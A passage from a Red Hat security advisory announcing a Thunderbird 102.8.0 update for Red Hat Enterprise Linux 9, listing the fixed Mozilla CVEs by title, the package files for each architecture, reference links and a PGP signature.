For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8  
2171397 - CVE-2023-0616 Mozilla: User Interface lockup with messages combining S/MIME and OpenPGP

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.8.0-2.el9_1.src.rpm

aarch64:  
thunderbird-102.8.0-2.el9_1.aarch64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.aarch64.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.aarch64.rpm

ppc64le:  
thunderbird-102.8.0-2.el9_1.ppc64le.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.ppc64le.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.ppc64le.rpm

s390x:  
thunderbird-102.8.0-2.el9_1.s390x.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.s390x.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.s390x.rpm

x86_64:  
thunderbird-102.8.0-2.el9_1.x86_64.rpm  
thunderbird-debuginfo-102.8.0-2.el9_1.x86_64.rpm  
thunderbird-debugsource-102.8.0-2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0616  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/O7/dzjgjWX9erEAQiXiA/+MoFSpvKXYrTWHqymS4HzuRuEyLw47Y7W  
yX/rs4C+wJ+0nwEhOK8Ds62OUAC0xP6v9p7Uub7xByXrRRyBnrfH+KgXjnzd7tec  
XTKIv2etk6hC7cb6HNNNqmG9sia7tQGnJJPjMYypzS52U2Bllf8Oq9X4lnMZFQls  
Th7nv0P7zuNnVq9bu2r2ndNQK1hT2ai0pLlf84Xnipk1eClfUXd6GZ5MIbwZCKqD  
S5VhAlGOIuPn4W/fT3UH2TVJchQ8ode84STyweUouLmhzMM5AcJN7XxAH0cmQIYi  
ZRnv8x3gshdmlzM95vBGQqwuTGC/DW1udbo5NgFQiIL1cjBxRduKmsp3MTFSXZLB  
tv0hLqjQMDC3Ldd1TmIfpxi3nayr8hCgpn06B6F1GUB8/vG+ocMkcO8uOxtNkty8  
27fqpuA29RJnWmUnSzfnepg7X0AOf/b+3MOcHI5336E0TBr+un9vluAbV9X/k5N6  
WBd7BppnnqcP0C4EmljCkKqLGPCbDQ7lWuLFdy6d8ye4aPJGstOgLkYc/vJak4e8  
rxfUFwCXRtAaSEzgjm7SjuII7Y+eEMkN7GARRdztc9Ta1Tl2VkXtgc0yjTaGCRg+  
nhr3EaTWMMw+dSTDbYjL9WqaOosv78CeT4Zu6EN/9elljlk0VU2hLJPchHkKEcnG  
c2zHHoFZY3k=gNig  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox